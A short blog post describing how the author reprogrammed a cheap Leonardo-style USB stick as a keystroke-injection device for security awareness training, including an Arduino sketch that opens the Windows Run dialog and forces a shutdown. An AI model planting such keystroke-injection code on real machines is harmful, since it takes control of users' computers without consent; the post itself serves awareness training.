Friday, 1 December 2017

Some fun with bad-usb devices (not rubber ducky)

Some fun with Leonardo-like usb devices

No, it is not rubber-ducky.

I was looking for a cheaper alternative to the rubber ducky devices to use for a user security awareness training at the media company I work for.

*** Check out the full video on my YoutubeChannel coming soon ***

mmmmh... Payroll data. Who could resist?
I found those USB devices resembling an ordinary thumb drive here:
At a little under 10€, it is a somewhat overpriced Leonardo without any useable GPIOs. But it perfectly serves my purpose.

From what I could see with Wireshark's USB sniffer, my devices came without anything malicious preinstalled. As expected, the device identified as an Arduino Leonardo board.

Being what it is, it can easily be programmed in the Arduino IDE.
Simply use it as a Leonardo board


 /*  
 Some fun with Keyboard Emulation  
 Shuts down a windows machine after 20 second  
  */  
 // the following line may not be needed by current versions of the IDE  
 //#include "Keyboard.h"  
 //some definitions, I do not really use  
 char ctrlKey = KEY_LEFT_CTRL;  
 char winKey = KEY_LEFT_GUI;  
 char altKey = KEY_LEFT_ALT;  
 void setup() {  
  // we only need a keyboard for this prank...  
  Keyboard.begin();  
 }  
 void loop() {  
 // 20 seconds to load a new sketch  
  delay(20000);  
 //Now run the shutdown command  
  Keyboard.press(KEY_LEFT_GUI);  
  Keyboard.press('r');  
  delay(200);  
  Keyboard.releaseAll();  
  delay(200);  
  Keyboard.print("shutdown /t 1 /f /s");  
  delay(100);  
  Keyboard.press(KEY_RETURN);  
  Keyboard.releaseAll();  
  // wait forever...   
  while (true);  
 }  

This script works as expected and shuts down the PC. It could just as well start an Internet Explorer and visit a malicious web site.
Keep in mind that everything runs under the current user's privileges, so users without administrative privileges can only do limited damage.

It became very clear to everyone attending my training, that plugging in an USB device of unknows contents and origin is simply a bad idea.

No comments:

Post a Comment